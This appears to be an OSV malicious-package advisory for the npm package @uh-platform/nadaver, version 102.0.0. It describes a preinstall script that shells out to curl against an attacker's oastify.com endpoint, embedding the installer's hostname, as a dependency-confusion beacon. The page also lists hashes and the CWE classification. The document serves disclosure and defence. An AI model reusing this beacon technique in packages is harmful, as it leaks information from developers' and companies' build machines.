MAL-2026-16360

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@uh-platform/nadaver/MAL-2026-16360.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16360
Published
2026-09-21T18:56:37Z
Modified
2026-09-21T19:30:05Z
Summary
Malicious code in @uh-platform/nadaver (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (66c8fbea9d97af1bd5c48147e744ff5e0feaded686c613591e7defd2f75e2e17)

On npm install, the package's preinstall script executes node index.js, which shells out curl to http://$(hostname).nadaver.pa33pg1od9cr4ffnrzec8864jvpmdd12.oastify.com/, embedding the installer machine's hostname as a subdomain of an attacker-controlled Burp Collaborator (oastify.com) endpoint. Both DNS resolution and the HTTP request leak the installer's hostname to the attacker on every install, with no user interaction. The @uh-platform scope combined with an unusually high version number (102.0.0) is consistent with a dependency-confusion beacon aimed at internal build systems that resolve the scope against the public npm registry.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020271",
            "import_time":  "2026-09-21T19:15:00.038167027Z",
            "modified_time":  "2026-09-21T18:56:37Z",
            "sha256":  "66c8fbea9d97af1bd5c48147e744ff5e0feaded686c613591e7defd2f75e2e17",
            "source":  "amazon-inspector",
            "versions":  [
                "102.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @uh-platform/nadaver

Package

Name
@uh-platform/nadaver
View open source insights on deps.dev
Purl
pkg:npm/%40uh-platform/nadaver

Affected ranges

Affected versions

102.*
102.0.0

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "index.js",
            "sha256":  "62aad3970128b9f299cbace594102ba0082fc76e232f195be9593a9aa29581fa",
            "tlsh":  "78e07d1449f9543632a29455fd2e981e76479902113ff6876dcfa71417c0948c41d2da"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "nadaver-102.0.0.tgz",
            "hashes":  {
                "sha1":  "6b06e8b66a1c528097c6bf333b25bf61c755d122",
                "sha512_sri":  "sha512-cbnhLc1pmjlP1DRoe05KsEcNdCJQYPjybyGfYfDtAzj46sFuO8MpI+zbPg6lGqenU801q/SndNCVUcXUcBJlvQ=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@uh-platform/nadaver/MAL-2026-16360.json"